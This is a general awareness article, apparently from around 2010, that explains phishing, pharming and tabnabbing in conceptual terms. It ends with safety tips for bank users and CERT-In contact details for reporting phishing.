Phishing
Introduction
As people increasingly rely on the Internet for business, personal finance and investment, Internet fraud becomes a greater and greater threat. One interesting species of Internet fraud is phishing. Phishing attacks use email messages and web sites designed to look as if they come from a known and legitimate organization, in order to deceive users into disclosing personal, financial, or computer account information. The attacker can then use this information for criminal purposes, such as identity theft, larceny, or fraud. Users are tricked into disclosing their information either by providing it through a web form or by downloading and installing hostile software.
In an attempt to fraud precisely, even the URL masking (pharming) can be done to avoid being detected. Pharming is a hacker’s attack aiming to redirect a website’s traffic to another, bogus website. Pharming can be conducted either by changing the hosts file on a victim’s computer or by exploitation of a vulnerability in DNS server software. DNS servers are computers responsible for resolving Internet names into their real addresses, they are the “signposts” of the Internet. Compromised DNS servers are sometimes referred to as “poisoned”. Recently in India, fraudsters target reserve bank of India’s web site for phishing attack and 6 other banks also in May 2010. Facebook has also found phishing page for its site on 2nd Dec, 2010.
Types of Phishing attack
Passive Phishing
In this type of phishing attack, the attacker’s web server impersonates the real server, but the real server is not involved into the attack.
Active Phishing
In this type of attack, the attacker’s machine acts only as a bridge to the real server, this effectively gives it Man-in-the-Middle capabilities.
Common Phishing techniques include sending a false URL via a fraudulent e-mail to the innocent user, and providing false links in web pages. In any case, once the user opens the URL, he is connected to the attacker’s web server which appears to be the legitimate server, where he is prompted to enter his personal details.
There are three possible Phishing scenarios:
1. Wrong-domain server: The most common scenario. the attacker solicited the user to connect to a false URL, which includes a domain-name different from the real server’s domain name.
2. DNS-poisoning: The attacker somehow managed to divert traffic designated to the real server’s URL to his own machine. This case is similar to the previous one, except that the domain name appears to be valid to the user. In this case no solicitation is required, as the user connects to the attacker’s machine whenever he attempts to connect the real server.
3. Real Man-in-the-Middle: The attacker is in full control of one of the hops in the path between the user and the real server. In this case no solicitation is required, as the attacker’s machine fully controls any traffic that passes through it.
Phishing Techniques
Link manipulation
Most methods of phishing use some form of technical deception designed to make a link in an e-mail appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers. In the following example URL, http://www.yourbank.example.com/, it appears as though the URL will take you to the example section of the yourbank website; actually this URL points to the “yourbank” (i.e. phishing) section of the example website. Another common trick is to make the displayed text for a link (the text between the < A > tags) suggests a reliable destination, when the link actually goes to the phishers’ site. The following example link, http://en.wikipedia.org/wiki/Genuine, appears to take you to an article entitled “Genuine”; clicking on it will in fact take you to the article entitled “Deception”. In the lower left hand corner of most browsers you can preview and verify where the link is going to take you.
Filter evasion
Here phishers use images instead of text to make it harder for anti-phishing filters to detect text, commonly used in phishing e-mails.
Website forgery
An attacker can even use flaws in a trusted website’s own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service’s own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, making it very difficult to spot without specialist knowledge.
Phone phishing
Not all phishing attacks require a fake website. Messages that claimed to be from a bank told users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) was dialled, prompts told users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.
Tabnabbing
Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular Web sites by impersonating those sites and convincing the user that the site is genuine. The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded. The exploit employs scripts to rewrite a page of average interest with an impersonation of a well-known website, when left unattended for some time. A user who returns after a while and sees the rewritten page may be induced to believe the page is legitimate and enter their login, password and other details that will be used for improper purposes. The attack can be made more likely to succeed if the script checks for well-known Web sites the user has loaded in the past or in other tabs, and loads a simulation of the same sites. This attack can be done even if JavaScript is disabled, using the “meta refresh” meta element.
Best practices against phishing attack for Bank users
1. Always type correct URL on address bar.
2. Never reply to any email which is asking you to enter details such as username , password , DoB etc
3. Check for https protocol on address bar, a pad lock and a valid certificate.
4. Avoid use of cyber cafes for internet banking.
5. suspected cases of phishing must be reported to the bank immediately.
6. Use anti phishing tools like netcraft toolbar, SpoofGuard ,eBay Toolbar,etc.
Where to report phishing incidents
CERT-In Incident Response Help Desk
Tel : 1600-11-4949
FAX : 1600-11-6969
E-mail: incident@cert-in.org.in
Reference
[1] http://en.wikipedia.org/wiki/Phishing
[2]“Online Identity Theft: Phishing Technology, Chokepoints and Countermeasures” -Aaron Emigh Radix Labs
[3] Phishing attacks and countermeasures- Anil Sagar
[4] Optimizing Anti-Phishing Solutions Based on User Awareness, Education and the Use of the Latest Web Security Solutions
[5] Video on phishing, http://www.youtube.com/watch?v=sqRZGhiHGxg
The video cannot be shown at the moment. Please try again later.